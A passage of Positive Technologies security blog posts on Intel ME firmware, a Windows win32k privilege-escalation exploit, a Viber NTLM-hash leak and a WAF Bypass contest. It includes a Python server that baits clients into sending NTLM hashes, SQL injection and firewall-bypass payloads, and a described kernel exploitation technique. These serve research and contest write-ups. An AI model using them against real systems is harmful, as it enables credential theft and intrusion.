↧
PostMessage Security in Chrome extensions at OWASP London
↧
Our new R&D center in Brno
We are pleased to announce the opening of our brand new R&D center in Brno, Czech Republic, which will focus on developing products to secure mobile telecommunications systems.
Why Brno?
As part of our global growth strategy to be closer to customers all over the world, we are seeking to open sales offices and development centers in a diverse range of countries.
Brno is the perfect place for an R&D center. Besides being a good geographic location, the city is home to development centers of numerous major IT and information security companies such as IBM, NetSuite, Red Hat and AVG Technologies. The local workforce is also young and well-educated with 90,000 of the city's 350,000 residents being students, the kind of people who thrive at PT.
The first employees in our Brno office
Big plans ahead
The new office is designed for 35–50 people and we plan to ramp up to full capacity over time. Given the demand and market opportunity, we are prioritizing the development team for SS7 security products – so if you are interested in mobile network security, please get in touch. That said, we will certainly be looking at opportunities to build other security products and increase our overall talent pool in the area. So, if you are an inquiring mind with a thirst for knowledge and an interest in information security R&D, drop us a line!
Our office is on the first floor of Spielberk Office Centre, along with AVG Technologies, SolarWinds, and Xura
Author: Maxim Shiyanovsky, Managing Director at Positive Technologies.
↧
Intel and Lenovo have restricted access to debugging interface of CPUs after Positive Technologies' revelations
Intel and Lenovo have released recommendations that help restrict access to the JTAG debugging interface of processors, which can be abused by attackers. The flaw was first discovered by Positive Technologies’ experts in December 2016.
At that time, Positive Technologies’ experts Maxim Goryachiy and Mark Ermolov presented their findings during a session at the Chaos Communication Congress (33C3) in Hamburg, explaining that modern Intel processors allow use of the debugging interface, via a USB 3.0 port available on many platforms, to gain full control over the system. Modern security systems cannot detect such attacks.
In April 2017 Intel officially acknowledged this vulnerability and released a BIOS update that blocks access to the debugging interface via USB 3.0 port. It also thanked Positive Technologies’ experts Maxim Goryachiy and Mark Ermolov for raising the issue.
In addition, a special security bulletin was published by Lenovo, one of the main equipment manufacturers that uses Intel processors. Several other major vendors have not yet issued recommendations for blocking the attack.
A video of Maxim Goryachiy and Mark Ermolov's talk at 33C3 can be found below:
Slides are available here.
↧
Bank employees using social networks at work: danger or mere distraction?
Banks have always been a lure for attackers, and while new technologies help to improve client service, they also create additional information security risks.
Cyberattacks on banks frequently start with criminals persuading employees of a financial institution to open specially crafted malware. Positive Technologies expert Timur Yunusov explains below whether it makes sense for banks to ban workplace use of social networks to reduce the risk of such attacks.
Employees: the weak link in security
Most cyberattacks on banking infrastructure rely on social engineering. By smoothly manipulating bank employees in correspondence or conversation, criminals frequently manage to penetrate a bank’s internal network. In the case of a targeted attack directed at many bank employees—we know of attacks targeting 10 to 50 (or even more) employees at the same time—we can safely assume that at least one of them will open malware attached to an email message, thereby infecting that employee’s computer.
Research performed by Positive Technologies demonstrates that information security awareness among employees remains low. Employees often open potentially malicious attachments and act in ways that may jeopardize the security of the company's infrastructure. Unfortunately, awareness remains low even at companies where employees undergo information security training.
One of the most effective tools for a hacker is the telephone—in 100 percent of cases with the clients we audited, our testers managed to convince the employee on the other end of the line to open the malicious file they had previously sent, or even to disclose the employee’s user name and password. Bank employees are a weak link in security, and therefore financial institutions have to think about how to reduce the risk of attacks on their staff.
Putting the social network controversy in perspective
Considering all the above, banning workplace use of social networks might seem to be a safe and sensible step. After all, popular online services are another way for attackers to spread malware.
But in reality, social networks are less useful for fraudsters than the phone, for instance. To persuade employees to perform a certain action, attackers first need to create relationships and earn trust. Targeted attacks via social networks are a time-consuming process that usually takes a week or more. Timing is trickier too, since if the attacker sends the malicious software or link when the employee is at home, the malware will infect the employee’s computer, instead of a bank computer.
Sometimes attackers hack the accounts of the target employee’s friends. In this case, success is more likely because people trust their friends more than they trust strangers. But performing this attack at any kind of scale against bank employees via social networks is quite difficult and has no guarantees of success. Overall, emails and phone calls are much more effective for hackers.
To ban or not to ban
Statistics show that employees of financial institutions are at risk and are the logical first target for hackers. Many methods are available to hackers for this purpose, including social networking websites.
But banning use of social networks may actually be counterproductive. After a ban, employees could switch over to other communication methods (for example, email and phone) that are statistically riskier with respect to social engineering.
In addition, outright prohibitions may not work and instead push employees to seek dangerous workarounds. At a minimum, any ban must be reinforced by training to educate employees on the basics of information security.
The more effective and reliable choice for banks and other businesses is to combine security awareness training with use of special protection and attack detection tools, such as security information and event management (SIEM) and web application firewall (WAF) solutions.
↧
Intel ME: The Way of Static Analysis
Image: Clive Darra, Flickr
Intel Management Engine (ME) has been known for over 10 years (since 2005), but official Internet sources about ME are few and far between. Fortunately, excellent works on the topic have been published in recent years. However, all of them deal with ME 10 and earlier, while modern computers implement ME 11, which was introduced in 2015 for the Skylake microarchitecture.
If you have never heard about ME, this is a good time to check out great slides from Igor Skochinsky about previous versions of ME.
In short, ME is a separate processor embedded in the chipset of any modern computer with an Intel CPU. ME runs even when the computer is sleeping or powered off (as long as it is plugged into a power outlet). ME can access any part of RAM, but the RAM region used by ME is not accessible from the OS. What’s more, ME is capable of out-of-band access to the network adapter.
The most recent version of ME is 11. Older versions of ME were based on the ARCtangent/ARCompact/SPARC architecture, but version 11 is x86-based. This is helpful for us researchers since x86 is much more convenient (thanks to more available tools and past research to refer to).
However, ME v11 uses a different layout of data within the firmware image and old tools are unable to handle this layout properly. ME v11 also uses an unknown set of Huffman tables (which are required to decompress many modules embedded in firmware). This all makes it very difficult to start exploration of ME internals…
Playing with system tools
Intel is known to have at least two sets of tools for ME. The first set, called “Intel ME System Tools,” is available to OEMs/vendors (think Acer, Gigabyte, Dell). This can be used to fine-tune ME firmware before delivering it to the end user. Fortunately for us, vendors often include these tools in the distribution package of BIOS updates, thus making them available to the general public.
The second set of tools is used internally at Intel and is able to do almost anything with ME (including Huffman compression). We have never heard of any leaks of these tools, however.
We have collected many ME firmware images on the Internet and extracted some information about ME modules. Unfortunately, several modules with promising names are always Huffman-compressed and not amenable to analysis. These module names include kernel, syslib (System Library), bup (Bring-Up), and amt (Active Management Technology).
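Extracting that module information starts with parsing the firmware's partition table. Below is a minimal sketch that lists partitions from a $FPT table; the header and entry offsets follow public ME research and are assumptions here, not an official specification:

```python
import struct

def list_fpt_partitions(fw: bytes):
    """List partitions from an ME Flash Partition Table ($FPT).
    Layout per public ME research (assumed, not an official spec):
    0x20-byte header with the entry count at offset 4, then 0x20-byte
    entries with the name at 0x00, offset at 0x08, size at 0x0C."""
    pos = fw.find(b"$FPT")
    if pos < 0:
        return []
    num_entries = struct.unpack_from("<I", fw, pos + 4)[0]
    parts = []
    for i in range(num_entries):
        base = pos + 0x20 + i * 0x20
        name = fw[base:base + 4].rstrip(b"\x00").decode("ascii", "replace")
        offset, size = struct.unpack_from("<II", fw, base + 8)
        parts.append((name, offset, size))
    return parts
```

Run over a dumped image, this yields entries such as FTPR (the main code partition) and NFTP, whose modules can then be carved out for further analysis.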
We started playing with Manifest Extension Utility (meu.exe) from ME System Tools and discovered that we could generate an XML file containing the text string “NOT_COMPRESSED”. We looked inside meu.exe and located an identical string. However, these strings are not referenced anywhere in code…
Explaining observations
After analysis, we found that the meu.exe binary contains an embedded file system that uses data compression and is accessible via the Qt Resource System interface. The same applies to Flash Image Tool (fit.exe). We extracted all embedded files and briefly analyzed them. Some files appear to be XML (human-readable) and contain helpful information (meaningful names and comments) about the binary format of internal structures (extensions) used in Code Partition Manifest and Module Metadata. Therefore, after interpreting the XML data, we were able to understand almost every field in Manifest and Metadata.
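Since the embedded resources are stored compressed, one generic way to pull such files out of any binary is to scan for zlib stream headers and attempt decompression at each candidate offset. The function below is our own illustration of this carving approach, not how meu.exe organizes its Qt resources internally:

```python
import zlib

def carve_zlib_blobs(data: bytes, min_size: int = 16):
    """Brute-force carving: at every 0x78 byte (the usual zlib header),
    try to inflate; keep results that are at least min_size bytes.
    Our own illustration, not the tools' actual resource layout."""
    blobs, pos = [], 0
    while True:
        pos = data.find(b"\x78", pos)
        if pos < 0:
            break
        try:
            out = zlib.decompressobj().decompress(data[pos:])
            if len(out) >= min_size:
                blobs.append((pos, out))
        except zlib.error:
            pass
        pos += 1
    return blobs
```

Trailing bytes after a stream are ignored by the decompressor, so the scan tolerates compressed blobs embedded mid-file.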
Metadata analysis can suggest many interesting conclusions. For example, we were able to find a list of internal device names and check access permissions (which module is permitted to access which device).
ROM bypass
We were lucky to find several ME firmware images that contain a ROM bypass partition—code and data that could be used instead of the ROM in case of errors in non-updatable areas of ME. The ROM bypass is not too big and can be analyzed in full. Some logic (related to memory-mapped devices and data obtained from them) can only be guessed at, but the process of loading and verifying the startup module (named rbe) seems straightforward.
Funny findings
We are still unable to build an overall picture of ME, due to Huffman compression of the kernel and syslib code. However, it is possible to analyze TXE (Trusted Execution Engine, the equivalent of ME for Intel Atom CPUs) thanks to the absence of Huffman compression. In addition, when we looked inside the decompressed vfs module, we encountered the strings “FS: bogus child for forking” and “FS: forking on top of in-use child,” which clearly originate from MINIX 3 code. It would seem that ME 11 is based on the MINIX 3 OS developed by Andrew Tanenbaum :)
Conclusion
Analyzing ME is a complicated task, and the work we have described here amounts to no more than 1% of the total. We hope that our findings will help other researchers so we can all learn more about Intel ME in the near future!
Author: Dmitry Sklyarov, Positive Technologies
↧
A closer look at the CVE-2017-0263 privilege escalation vulnerability in Windows
May has been a busy month for vulnerabilities in the world's most popular desktop operating system. Hackers have made headlines with massive infections by WannaCry ransomware, which exploits an SMB security flaw and the ETERNALBLUE tool. Shortly prior, on May 9, Microsoft fixed CVE-2017-0263, which had made it possible for attackers to gain maximum system privileges on PCs running Windows 10, Windows 8.1, Windows 7, Windows Server 2008, Windows Server 2012, and Windows Server 2016.
CVE-2017-0263 had already been used in phishing messages. The emails contained an exploit that first entered the system by taking advantage of incorrect handling of EPS files by Microsoft Office (CVE-2017-0262) and then, once inside, leveraged CVE-2017-0263 to get full administrator rights. Two years ago we looked at a similar vulnerability in Windows, and here we will see how the new CVE-2017-0263 opens the way to "pwning" remote workstations and servers.
In short, this is a use-after-free vulnerability (CWE-416): when context menu windows were closed and the memory occupied by the menu was freed, the pointer to the freed memory was not zeroed out. As a result, the pointer could be reused.
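The kernel bug itself lives in C code, but the dangling-pointer pattern is easy to illustrate with a toy slot allocator (a deliberately simplified model of our own, not the actual win32k logic):

```python
class ToyHeap:
    """Toy slot allocator: alloc() returns slot indices ("pointers"),
    free() recycles them via a free list, like a real heap."""
    def __init__(self):
        self.slots, self.free_list = [], []

    def alloc(self, value):
        if self.free_list:                # freed slots are reused first
            idx = self.free_list.pop()
            self.slots[idx] = value
            return idx
        self.slots.append(value)
        return len(self.slots) - 1

    def free(self, idx):
        self.slots[idx] = None
        self.free_list.append(idx)

heap = ToyHeap()
menu = heap.alloc({"flags": "fMenuWindowRef"})  # the context menu
heap.free(menu)                                 # menu closed, memory freed,
dangling = menu                                 # ...but pointer not zeroed
heap.alloc({"flags": "attacker-controlled"})    # attacker reclaims the slot
hijacked = heap.slots[dangling]                 # stale pointer now reads attacker data
```

Whoever reclaims the freed slot controls what the stale pointer dereferences, which is exactly the lever the exploit below uses.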
The below discussion covers the process of window handling in the win32k.sys driver and how this process makes it possible to exploit the vulnerability.
Context menus
Every Windows user is familiar with context menus. These are the menus that drop down when we right-click. The appearance of this menu and how it is displayed are completely up to the developer of each application. WinAPI provides developers with the TrackPopupMenuEx function, which causes a context menu to appear with the specified parameters at the specified location on the screen.
The state of the context menu is stored in the kernel in the variable win32k!gMenuState, which is a win32k!tagMENUSTATE structure:
0: kd> dt win32k!tagMenuState
+0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU
+0x004 flags : Int4B
+0x008 ptMouseLast : tagPOINT
+0x010 mnFocus : Int4B
+0x014 cmdLast : Int4B
+0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO
+0x01c dwLockCount : Uint4B
+0x020 pmnsPrev : Ptr32 tagMENUSTATE
+0x024 ptButtonDown : tagPOINT
+0x02c uButtonDownHitArea: Uint4B
+0x030 uButtonDownIndex : Uint4B
+0x034 vkButtonDown : Int4B
+0x038 uDraggingHitArea : Uint4B
+0x03c uDraggingIndex : Uint4B
+0x040 uDraggingFlags : Uint4B
+0x044 hdcWndAni : Ptr32 HDC__
+0x048 dwAniStartTime : Uint4B
+0x04c ixAni : Int4B
+0x050 iyAni : Int4B
+0x054 cxAni : Int4B
+0x058 cyAni : Int4B
+0x05c hbmAni : Ptr32 HBITMAP__
+0x060 hdcAni : Ptr32 HDC__
Note that all of the call stacks and structures presented here are taken from Windows 7 x86. The 32-bit OS version is used for convenience: arguments for most functions are stored on the stack, and there is no WoW64 layer, which would otherwise switch to a 64-bit stack during system calls and cause 32-bit stack frames to be lost when the call stack is printed. A full list of vulnerable operating systems is given on the Microsoft website.
The win32k!tagMENUSTATE structure stores, for example, such information as: the clicked region of the screen, number of the most recent menu command, and pointers to the windows that were clicked or selected for drag-and-drop. The list of context menu windows is stored in the first field, pGlobalPopupMenu, which is of the type win32k!tagPOPUPMENU:
0: kd> dt win32k!tagPopupMenu
+0x000 flags : Int4B
+0x004 spwndNotify : Ptr32 tagWND
+0x008 spwndPopupMenu : Ptr32 tagWND
+0x00c spwndNextPopup : Ptr32 tagWND
+0x010 spwndPrevPopup : Ptr32 tagWND
+0x014 spmenu : Ptr32 tagMENU
+0x018 spmenuAlternate : Ptr32 tagMENU
+0x01c spwndActivePopup : Ptr32 tagWND
+0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU
+0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU
+0x028 posSelectedItem : Uint4B
+0x02c posDropped : Uint4B
+0x030 ppmlockFree : Ptr32 tagPOPUPMENU
In both structures we have highlighted the fields of interest, which will be used below to describe the exploitation process.
The variable win32k!gMenuState is initialized when a context menu is created, during the previously mentioned TrackPopupMenuEx function. Initialization occurs when win32k!xxxMNAllocMenuState is called:
1: kd> k
# ChildEBP RetAddr
00 95f29b38 81fe3ca6 win32k!xxxMNAllocMenuState+0x7c
01 95f29ba0 81fe410f win32k!xxxTrackPopupMenuEx+0x27f
02 95f29c14 82892db6 win32k!NtUserTrackPopupMenuEx+0xc3
03 95f29c14 77666c74 nt!KiSystemServicePostCall
04 0131fd58 7758480e ntdll!KiFastSystemCallRet
05 0131fd5c 100015b3 user32!NtUserTrackPopupMenuEx+0xc
06 0131fd84 7756c4b7 q_Main_Window_Class_wndproc (call TrackPopupMenuEx)
And when the context menu is no longer needed—for example, the user selected a menu item or clicked outside of the menu—the function win32k!xxxMNEndMenuState is called and frees up the state of the menu:
1: kd> k
# ChildEBP RetAddr
00 a0fb7ab0 82014f68 win32k!xxxMNEndMenuState
01 a0fb7b20 81fe39f5 win32k!xxxRealMenuWindowProc+0xd46
02 a0fb7b54 81f5c134 win32k!xxxMenuWindowProc+0xfd
03 a0fb7b94 81f1bb74 win32k!xxxSendMessageTimeout+0x1ac
04 a0fb7bbc 81f289c8 win32k!xxxWrapSendMessage+0x1c
05 a0fb7bd8 81f5e149 win32k!NtUserfnNCDESTROY+0x27
06 a0fb7c10 82892db6 win32k!NtUserMessageCall+0xcf
07 a0fb7c10 77666c74 nt!KiSystemServicePostCall
08 013cfd90 77564f21 ntdll!KiFastSystemCallRet
09 013cfd94 77560908 user32!NtUserMessageCall+0xc
0a 013cfdd0 77565552 user32!SendMessageWorker+0x546
0b 013cfdf0 100014e4 user32!SendMessageW+0x7c
0c 013cfe08 775630bc q_win_event_hook (call SendMessageW(MN_DODRAGDROP))
Important here is that the gMenuState.pGlobalPopupMenu field is updated only during initialization in the xxxMNAllocMenuState function—it is not zeroed out when the structure is destroyed.
xxxMNEndMenuState function
This function is the star of our story. Its handful of lines harbor the vulnerability.
xxxMNEndMenuState starts with deinitialization and freeing of information related to the context menu. The MNFreePopup function—to which we will return in the following section—is called. The main task of MNFreePopup is to decrement reference counters for windows related to the particular context menu. When the reference count falls to zero, this decrementing can cause the window to be destroyed.
Then the xxxMNEndMenuState function checks the fMenuWindowRef flag of the pGlobalPopupMenu field to see if any references remain to the main window of the context menu. This flag is cleared upon destruction of the window contained in the spwndPopupMenu field of the context menu:
3: kd> k
# ChildEBP RetAddr
00 95fffa5c 81f287da win32k!xxxFreeWindow+0x847
01 95fffab0 81f71252 win32k!xxxDestroyWindow+0x532
02 95fffabc 81f7122c win32k!HMDestroyUnlockedObject+0x1b
03 95fffac8 81f70c4a win32k!HMUnlockObjectInternal+0x30
04 95fffad4 81f6e1fc win32k!HMUnlockObject+0x13
05 95fffadc 81fea664 win32k!HMAssignmentUnlock+0xf
06 95fffaec 81fea885 win32k!MNFreePopup+0x7d
07 95fffb14 8202c3d6 win32k!xxxMNEndMenuState+0x40
xxxFreeWindow+83f disasm:
.text:BF89082E loc_BF89082E:
.text:BF89082E and ecx, 7FFFFFFFh ; ~fMenuWindowRef
.text:BF890834 mov [eax+tagPOPUPMENU.flags], ecx
As seen above, the flag is discarded and therefore the memory occupied by the pGlobalPopupMenu field is freed up, but the pointer itself is not zeroed out. This causes a dangling pointer, which under certain circumstances can be reused.
Immediately after the context menu memory is freed up, the execution flow deletes the references stored in the context menu state structure that relate to clicked windows (uButtonDownHitArea field) when the menu was active or were selected for drag-and-drop (uDraggingHitArea field).
Exploitation method
A window object in the kernel is described by a tagWND structure. In our earlier article we described the concept of kernel callbacks, which will be needed here as well. The number of active references to a window is stored in the cLockObj field of the tagWND structure.
Deleting references to a window, as shown in the previous section, can cause the window itself to be destroyed. Before the window is destroyed, a WM_NCDESTROY change-of-window-state message is sent to the window.
This means that while xxxMNEndMenuState is running, control can be transferred to user application code—specifically, to the window procedure of the window being destroyed. This happens when no references remain to a window whose pointer is stored in the gMenuState.uButtonDownHitArea field.
2: kd> k
# ChildEBP RetAddr
0138fc34 7756c4b7 q_new_SysShadow_window_proc
0138fc60 77565f6f USER32!InternalCallWinProc+0x23
0138fcd8 77564ede USER32!UserCallWinProcCheckWow+0xe0
0138fd34 7755b28f USER32!DispatchClientMessage+0xcf
0138fd64 77666bae USER32!__fnNCDESTROY+0x26
0138fd90 77564f21 ntdll!KiUserCallbackDispatcher+0x2e
95fe38f8 81f56d86 nt!KeUserModeCallback
95fe3940 81f5c157 win32k!xxxSendMessageToClient+0x175
95fe398c 81f5c206 win32k!xxxSendMessageTimeout+0x1cf
95fe39b4 81f2839c win32k!xxxSendMessage+0x28
95fe3a10 81f2fb00 win32k!xxxDestroyWindow+0xf4
95fe3a24 81f302ee win32k!xxxRemoveShadow+0x3e
95fe3a64 81f287da win32k!xxxFreeWindow+0x2ff
95fe3ab8 81f71252 win32k!xxxDestroyWindow+0x532
95fe3ac4 81f7122c win32k!HMDestroyUnlockedObject+0x1b
95fe3ad0 81f70c4a win32k!HMUnlockObjectInternal+0x30
95fe3adc 81f6e1fc win32k!HMUnlockObject+0x13
95fe3ae4 81fe4162 win32k!HMAssignmentUnlock+0xf
95fe3aec 81fea8c3 win32k!UnlockMFMWFPWindow+0x18
95fe3b14 8202c3d6 win32k!xxxMNEndMenuState+0x7e
For example, in the call stack shown above, the WM_NCDESTROY message is handled by the window procedure for the SysShadow window class. Windows of this class are designed to provide shadowing and are usually destroyed together with the windows they shadow.
Now let's look at the most interesting part: how this window message is handled, in the form found in the malware sample taken from a .docx phishing attachment.
When the attacker takes control, the first order of business is to reclaim the freed memory still referenced by gMenuState.pGlobalPopupMenu, in order to reuse this pointer later. To allocate that memory block, the exploit performs a large number of SetClassLongW calls, setting a specially formed menu name for window classes created for this purpose:
2: kd> k
# ChildEBP RetAddr
00 9f74bafc 81f240d2 win32k!memcpy+0x33
01 9f74bb3c 81edadb1 win32k!AllocateUnicodeString+0x6b
02 9f74bb9c 81edb146 win32k!xxxSetClassData+0x1d1
03 9f74bbb8 81edb088 win32k!xxxSetClassLong+0x39
04 9f74bc1c 82892db6 win32k!NtUserSetClassLong+0xc8
05 9f74bc1c 77666c74 nt!KiSystemServicePostCall
06 0136fac0 7755658b ntdll!KiFastSystemCallRet
07 0136fac4 775565bf user32!NtUserSetClassLong+0xc
08 0136fafc 10001a52 user32!SetClassLongW+0x5e
09 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call SetClassLongW)
After the memory is occupied, the next stage begins. The exploit accesses the NtUserMNDragLeave system procedure, which performs a nested call of the xxxMNEndMenuState function. Clearing of the gMenuState structure starts again:
2: kd> k
# ChildEBP RetAddr
00 9f74bbf0 8202c3d6 win32k!xxxMNEndMenuState
01 9f74bc04 8202c40e win32k!xxxUnlockMenuStateInternal+0x2e
02 9f74bc14 82015672 win32k!xxxUnlockAndEndMenuState+0xf
03 9f74bc24 82001728 win32k!xxxMNDragLeave+0x45
04 9f74bc2c 82892db6 win32k!NtUserMNDragLeave+0xd
05 9f74bc2c 100010a9 nt!KiSystemServicePostCall
06 0136fafc 10001a84 q_exec_int2e (int 2Eh)
07 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call q_exec_int2e)
As described in the previous section, the procedure starts by deinitializing the pGlobalPopupMenu field; this process is performed by the MNFreePopup call, which decrements the reference counters for windows contained in various fields of tagPOPUPMENU. After the prior step, the content of this structure is now controlled by the attacker. So when the described chain of actions is performed, the attacker gets a decrement primitive to an arbitrary kernel address.
In this exploit, an address is inserted in the tagPOPUPMENU.spwndPrevPopup field and the primitive is used to decrement the field for flags of one of the windows, causing that window to be marked with the flag bServerSideProc, which means that its window procedure is run in the kernel.
As the code shows, immediately after returning from NtUserMNDragLeave, a message is sent to the window by a SendMessage call, causing arbitrary kernel code execution. At this stage, the attacker usually steals a system process token to obtain system privileges. Indeed, this is what happened in the exploit here.
In conclusion
What are the salient points of the exploit? The most common cause of vulnerabilities in the win32k.sys driver is access to user-mode callbacks while kernel structures are in an intermediate state, mid-transaction. Setting the bServerSideProc flag for a window is also a popular method for kernel code execution. In addition, the most convenient way to leverage kernel code execution for privilege escalation is to copy a reference to a system token.
In that sense, the exploit looks rather mundane. At the same time many of the nuances have been simplified or purposefully omitted from this discussion.
For example, we did not dwell on the exact appearance of the context menu or menu-related actions that cause the necessary state of the flags and fields of the win32k!gMenuState variable during execution of the xxxMNEndMenuState procedure. Left unmentioned was the fact that the menu names set during SetClassLong calls should, on the one hand, be a Unicode string with no null characters but, on the other hand, be a legitimate tagPOPUPMENU structure. This also means that the address of the window in the kernel (to which the decrement field will refer) must not contain any wchar_t null characters. These are just a few examples from a rather long list.
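The "no null wchar_t" constraint can be checked mechanically. The sketch below packs a hypothetical 32-bit tagPOPUPMENU image (all field values are ours, chosen purely for illustration) and verifies that, read as UTF-16LE, it contains no null character:

```python
import struct

def has_null_wchar(buf: bytes) -> bool:
    """True if the buffer, read as UTF-16LE, contains a null character.
    SetClassLongW would truncate the sprayed menu name at that point."""
    return any(buf[i:i + 2] == b"\x00\x00" for i in range(0, len(buf) - 1, 2))

# Hypothetical 32-bit tagPOPUPMENU image (first 8 dwords, so that
# spwndPrevPopup lands at offset 0x10); values are illustrative and
# chosen so that no aligned 16-bit half is zero.
good_addr = 0xfea1fea1   # a usable spwndPrevPopup value
fake_popup = struct.pack("<8I", 0x00010001, 0x41414141, 0x42424242,
                         0x43434343, good_addr, 0x45454545,
                         0x46464646, 0x47474747)
```

An address such as 0xfe000000 could not be smuggled in this way, since its low half is a null wchar_t and would cut the menu-name string short.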
As for the update that fixes the vulnerability, a quick glance shows that the buffer addressed by the gMenuState.pGlobalPopupMenu field is now freed closer to the end of the xxxMNEndMenuState function, well after the MNFreePopup and UnlockMFMWFPWindow calls, and the pointer is zeroed out. Thus the patch addresses both of the causes whose simultaneous presence made the vulnerability possible.
↧
Positive Technologies expert helps to fix vulnerability in Viber for Windows
Viber has fixed a vulnerability in the company's Windows client found by a group of security experts that included a Positive Technologies researcher. This security bug enabled attackers to steal data used for user authentication in Windows. Users are urged to update to Viber version 6.7.2.
"In essence, when a link resembling http://host/img.jpg is sent during a chat, Viber would first load it as the client who sent the link. If a picture is hosted at the indicated URL, then Viber would try to download it as the receiving client. This scheme would work only if the initiating client confirmed the presence of a picture at that URL," explained Timur Yunusov, Head of the Banking Security Unit at Positive Technologies.
If the server sent a 401 "authentication required" message (instead of a picture) in response to the second request and then asked for NTLM authentication, Viber would send the user's NTLM hash.
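An attacker-side server for this scenario might behave as follows: answer the sender's probe with 200 so the link is confirmed as a picture, then demand NTLM authentication from the victim's client. Below is a minimal sketch using Python's standard library; the flow is our reconstruction of the described behavior, not Viber's or the original attacker's code:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

def bait_response(hit_number: int):
    """First request: confirm a picture exists (the sending client's
    check). Later requests: reply 401 and ask for NTLM, so a Windows
    client that auto-negotiates may send the user's NTLM response."""
    if hit_number == 1:
        return 200, [("Content-Type", "image/jpeg"), ("Content-Length", "0")]
    return 401, [("WWW-Authenticate", "NTLM"), ("Content-Length", "0")]

class NTLMBaitHandler(BaseHTTPRequestHandler):
    hits = 0

    def do_GET(self):
        type(self).hits += 1
        status, headers = bait_response(type(self).hits)
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    def log_message(self, *args):  # silence request logging
        pass

# To serve: HTTPServer(("0.0.0.0", 8080), NTLMBaitHandler).serve_forever()
```

The interesting part is entirely in the second response's WWW-Authenticate header; everything else is ordinary HTTP plumbing.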
In addition, the vulnerability made it possible to force the client to send arbitrary GET requests. This attack could, for example, be used to reprogram home routers and other devices.
"This vulnerability could be used only by an attacker whose mobile phone number was saved in the user's contact list. Therefore no mass attack on Windows users was possible. We also note that a successful attack generally required performing a whole series of GET requests, meaning that the attacker would need to send multiple links to a potential victim," commented the Viber press service. "Around six percent of our active users in Russia have used the Windows client at least once in the last month to send a message, perform calls, or view public chats."
The vulnerability in the Viber client for Windows has been fixed as of Viber version 6.7.2, which is currently available for download.
↧
WAF Bypass at PHDays VII: Results and Answers
Continuing the tradition of past years, the WAF Bypass contest was held at last month's PHDays. Participants tried to bypass PT Application Firewall protection mechanisms in order to find special flags accessible through vulnerabilities specially left in web applications. In a series of challenges, the organizers disabled different features of PT Application Firewall, leaving a "way in" for participants to take advantage of. The focus of attention this time was a prototype database firewall (DBFW), which analyzed SQL traffic from applications to databases.
350 points
For this challenge, participants had to find a way around detection of SQL injections. A PHP module, replacing the original mysql_query() function with one of its own, was installed on the application server. In this function, the values of HTTP parameters (GET, POST, Cookie) are added to the start of an SQL query in the form of a comment.
After the application sends an SQL query to the database through the replaced function, the query is intercepted by the DBFW. The DBFW extracts the values of HTTP parameters from the comment and looks for them in the SQL query. If a substring matching a parameter value is found, it is replaced by a constant. Then the two queries are tokenized: before replacement and after. If the number of tokens does not match, this indicates SQL injection. The basic principle is that the clearest sign of an injection attack is a change in the parsing tree: if the number of tokens has changed, then the parsing tree has changed, which means that injection has occurred.
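The substitute-and-compare check can be sketched with a crude regex tokenizer (a real DBFW uses a full SQL lexer; this simplified version is ours):

```python
import re

# Crude SQL tokenizer: comments, string literals, words, single symbols
TOKEN = re.compile(r"/\*.*?\*/|'(?:[^'\\]|\\.)*'|\w+|[^\w\s]", re.S)

def tokens(sql: str):
    return TOKEN.findall(sql)

def looks_like_injection(query: str, param_value: str) -> bool:
    """DBFW-style check: replace the HTTP parameter value with a constant
    and compare token counts; a mismatch means the parameter changed the
    parsing tree, i.e. SQL injection."""
    normalized = query.replace(param_value, "0")
    return len(tokens(query)) != len(tokens(normalized))

benign_param = "15"
inject_param = "-1 union select 1,2,flag,4 from flags"
benign = "SELECT * FROM posts WHERE id = " + benign_param
inject = "SELECT * FROM posts WHERE id = " + inject_param
```

A plain numeric value collapses to the same eight tokens as the normalized query, while the union injection adds a dozen extra tokens and is flagged.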
We talked more about the logic of this algorithm in the talk "Database Firewall from Scratch", in which we shared our experience researching DBFW mechanisms. Those who saw the talk were surely aware of the main drawback of this approach: comparing token counts is not a 100% reliable method, since it is possible to alter the parsing tree in such a way that the number of tokens in the original and analyzed queries still matches. An attacker could add comments so that the number of tokens in the two queries is the same, even though the tokens themselves are different. The correct way is to build and compare the abstract syntax trees (ASTs) of the two queries. So to complete this challenge, participants needed to create a vector with the same number of tokens as the original, injection-free query:
/post.php?p=-1 union select 1,2,(select flag from flags order by id,1),4 -- -
Participants found a flaw in our ANTLR parser for MySQL. MySQL supports conditional comments using the notation /*! … */: everything inside such a comment is executed by MySQL but ignored by other databases.
http://task1.waf-bypass.phdays.com/post.php?p=(select /*!50718 ST_LatFromGeoHash((SELECT table_name FROm information_schema.tables LIMIT 1)) */) and true and true and true order by id desc limit 10 -- (Arseny Sharoglazov)
http://task1.waf-bypass.phdays.com/post.php?p=/*!1111111 union select 1 id,flag,1,1 from flags where 1*/ (Sergey Bobrov)
For the second challenge, participants had access to an application that allowed adding notes. The full SQL query was passed in hex in parameter q:
http://task2.waf-bypass.phdays.com/notes.php?q=53454c454354207469746c652c20626f64792046524f4d206e6f746573204c494d4954203235 (SELECT title, body FROM notes LIMIT 25 )
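Decoding the q parameter takes one line of Python:

```python
# q parameter from the challenge URL, split only for readability
q = ("53454c454354207469746c652c20626f64792046524f4d"
     "206e6f746573204c494d4954203235")
sql = bytes.fromhex(q).decode("ascii")
print(sql)  # SELECT title, body FROM notes LIMIT 25
```

The reverse direction, encoding a crafted query for the parameter, is just `query.encode().hex()`.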
Using the ALFAScript language, we set an attribute-based access control (ABAC) policy allowing users to perform only INSERT, UPDATE, and SELECT, and only on the notes table. Therefore, access to the flags table was blocked. But we left a way around this restriction by allowing CREATE. Our intended solution involved creating an event (https://dev.mysql.com/doc/refman/5.7/en/create-event.html) that writes a flag to the notes table:
CREATE EVENT `new_event` ON SCHEDULE EVERY 60 SECOND STARTS CURRENT_TIMESTAMP ON COMPLETION NOT PRESERVE ENABLE COMMENT '' DO insert into notes (title, body) VALUES ((select flag from flags limit 1), 2)
Besides CREATE EVENT, participants could use CREATE TABLE to get a flag in a MySQL message after first causing an error (solution by Arseny Sharoglazov):
CREATE TABLE ggg AS SELECT ST_LongFromGeoHash (flag) FROM flags;
Sergey Bobrov proposed an alternative method using ON DUPLICATE KEY UPDATE, which enables running UPDATE inside INSERT with a single query:
